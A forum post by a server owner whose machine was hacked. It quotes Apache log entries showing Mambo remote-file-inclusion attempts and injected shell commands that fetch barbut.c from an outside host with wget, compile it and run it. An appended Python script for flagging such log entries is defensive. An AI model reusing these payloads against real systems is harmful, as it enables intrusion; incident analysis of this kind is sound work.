Hi everyone.
I found my server completely hacked; the data center has shut the machine down entirely.
Looking through the Apache logs I see this barbut.c and http://crekom.com/barbut.c.
DO YOU HAVE ANY IDEA WHAT KIND OF ATTACK THIS IS AND WHICH HOLES IT EXPLOITED?
################################
[21/Nov/2007:22:04:58 +0100] "GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut ; HTTP/1.1" 200 1503 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1Connection: close"
62.105.180.178 - - [21/Nov/2007:22:05:00 +0100] "GET rm -f barbut barbut.c HTTP/1.1" 400 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1Connection: close"
62.105.180.178 - - [21/Nov/2007:22:05:02 +0100] "GET cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./b HTTP/1.1" 400 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1Connection: close"
62.105.180.178 - - [21/Nov/2007:22:05:02 +0100] "GET /mambo//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://crekom.com/ HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1Connection: close"
62.105.-.178 - - [21/Nov/2007:22:05:03 +0100] "GET arbut ;rm -f barbut barbut.c HTTP/1.1" 400 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1Connection: close"
62.105.180.178 - - [21/Nov/2007:22:05:07 +0100] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://crekom.com/cmd.gi HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1Connection: close"
62.105.-.- - - [21/Nov/2007:22:05:09 +0100] "GET f?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut HTTP/1.1" 400 305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1Connection: close"
62.105.-.- - -

Connection: close"
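A log-triage sketch for entries like those in the post above, added here as an example and not part of the original post: it flags requests where a parameter value is a remote URL (as with `mosConfig_absolute_path`), where PHP superglobal names are passed as parameters, or where download/compile commands are chained in the URI, and sorts the hits so that requests the server answered with 2xx come first. The function names, the indicator set and the sample entries (documentation IPs, placeholder host) are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Request and status of an access-log entry. The URI may hold raw spaces (as in
# the entries above), so match greedily up to the final ' HTTP/x.y" <status>'.
REQ = re.compile(r'"[A-Z]+ (?P<uri>.*) HTTP/\d\.\d" (?P<status>\d{3})')
# A parameter whose value is itself a URL (remote-include indicator).
REMOTE_PARAM = re.compile(r'[?&](?P<name>[^=&]+)=(?:https?|ftp)://', re.I)
# PHP superglobal names supplied as request parameters.
SUPERGLOBAL = re.compile(r'[?&](?:GLOBALS|_REQUEST|_GET|_POST|_SERVER)(?:\[|=)')
# Download/compile tooling; only flagged when chained with ';' or '|'.
SHELL_TOOL = re.compile(r'\b(?:wget|curl|gcc|killall|chmod)\b')

def triage(line):
    """Return (status, sorted indicator tags) for one entry, None if unparsable."""
    m = REQ.search(line)
    if not m:
        return None
    uri = unquote(m.group("uri"))
    tags = set()
    rp = REMOTE_PARAM.search(uri)
    if rp:
        tags.add("remote-url-param:" + rp.group("name"))
    if SUPERGLOBAL.search(uri):
        tags.add("superglobal-param")
    if SHELL_TOOL.search(uri) and re.search(r"[;|]", uri):
        tags.add("shell-chain")
    return int(m.group("status")), sorted(tags)

def prioritize(lines):
    """Flagged entries as (status, tags, line); 2xx (request served) first."""
    hits = []
    for line in lines:
        result = triage(line)
        if result and result[1]:
            hits.append((result[0], result[1], line))
    return sorted(hits, key=lambda h: (not 200 <= h[0] < 300, h[0]))

# Constructed sample entries (documentation IPs, placeholder host), not real logs.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://files.example.invalid/ HTTP/1.1" 404 293 "-" "-"',
    '192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /x.php?cmd=cd /tmp;wget http://files.example.invalid/a.c;gcc a.c -o a HTTP/1.1" 200 1503 "-" "-"',
    '192.0.2.20 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for status, tags, line in prioritize(SAMPLE):
        print(status, tags, line.split('"')[1])
```

A flagged entry with a 2xx status only shows that the request was served, so it marks where to start looking on the host rather than proving that the command ran.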